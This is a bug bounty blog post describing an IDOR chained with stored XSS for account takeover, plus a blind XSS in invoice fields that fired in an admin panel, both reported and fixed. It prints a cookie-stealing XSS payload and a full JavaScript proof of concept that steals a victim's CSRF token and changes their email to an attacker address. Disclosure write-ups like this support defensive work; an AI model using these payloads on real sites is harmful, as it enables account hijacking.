Account Takeover and Blind XSS! Go Pro, get Bugs!

May 30, 2018
Tabahi

hi all,

I’m writing my first bug bounty post, this is about some bugs I found in a private program on Hackerone.

So in this program, after hunting some bugs in the application, I went for PRO features to get some more attack surface. I found some more bugs there, 2 of which had huge impact.

Account Takeover

I first found an IDOR, which allowed me to create an  ​element x in every user’s account. After reporting the issue, I told Bull about my bug, he suggested I inject some javascript in there. I went back and injected a '%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E payload in a text field of element x, and alert popped up.

Now, I could store XSS in every user’s account through the IDOR. There was no CSP blocking external scripts, so I could now just write a small script which would steal a victim’s CSRF token and then change their emailID or Invite me as an Admin, taking over their account.

As with the IDOR, javascript could be stored in all accounts remotely, and as they would execute, ..take over all accounts. I updated the report, told them about the XSS and the Impact of both chained together.

I gave them the following javascript code for POC:

function stealEmailToken()
{
var fetchHash = new XMLHttpRequest();

var url = "https://--domain--/--path--/personal/update_email.html";
var datax;
var all_elements;
var vc_email_token='initial';

fetchHash.onreadystatechange=function ()
{
if(fetchHash.readyState==4 && fetchHash.status==200)
{

datax = fetchHash.responseText;
var loot = document.createElement('html');
loot.innerHTML = datax;
all_elements = loot.getElementsByTagName( 'input' );
vc_email_token = all_elements[2].value;
alert('Stole your Email change Token: '+vc_email_token+' ...Tabahi');
//hack(vc_email_token);

}

}

fetchHash.open("GET",url, true);
fetchHash.withCredentials=true;
fetchHash.send();

}

stealEmailToken();

function hack(emailToken)
{

var HackAccount = new XMLHttpRequest();

url= "https://--domain--/--path--/personal/update_email.html";

HackAccount .open("POST",url, true);

HackAccount .withCredentials=true;

var data= 'AccountEmailForm%5BsEmail%5D%5Bfirst%5D=attacker%40attacker.com&AccountEmailForm%5BsEmail%5D%5Bsecond%5D=attacker%40attacker.com&AccountEmailForm%5B_token%5D='+emailToken ;

HackAccount .setRequestHeader('X-Requested-With','XMLHttpRequest');

HackAccount .setRequestHeader('Content-Type','application/x-www-form-urlencoded');
HackAccount .send(data);

}

The above script would read the victim’s csrf token from input elements of the         ...personal/update_email.html page, the hack() function would then send a POST request with the stolen token to change the victim’s email ID.

The team fixed the bug in a few days. and awarded a bounty of $3500.

 

The Blind XSS

When I went to purchase the PRO features of the application, there were 2 payment methods, credit card and bank transfer. With the bank transfer method, an invoice was generated and emailed to the user using some input---name,address etc. fields supplied by the user at the time of billing.

So, here I tried to inject some html elements, to see if the server would execute script in the .pdf invoice generated. But, nothing happened.

Also, in the elements I injected, I had put a Blind-XSS payload.

After a few days, while casually browsing my XSSHunter account, I saw a payload had triggered on this program’s Admin Panel. Wow!

Along with generating the .pdf, the invoice was listed un-sanitized in the program’s Admin panel. With the screenshot from their page, around a thousand records of their customer Invoices were exposed to me.

Below pic shows XSS triggered in the name and address field:

xyzzzz.jpg

 

I reported the bug to the team.

It was fixed in a few days, bounty awarded was $3500.

 

Got something to say? Tweet me @tabahi_90

Thanks for reading 🙂

 

 

Advertisements

Leave a Reply

Required fields are marked *.

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Powered by WordPress.com.
%d bloggers like this: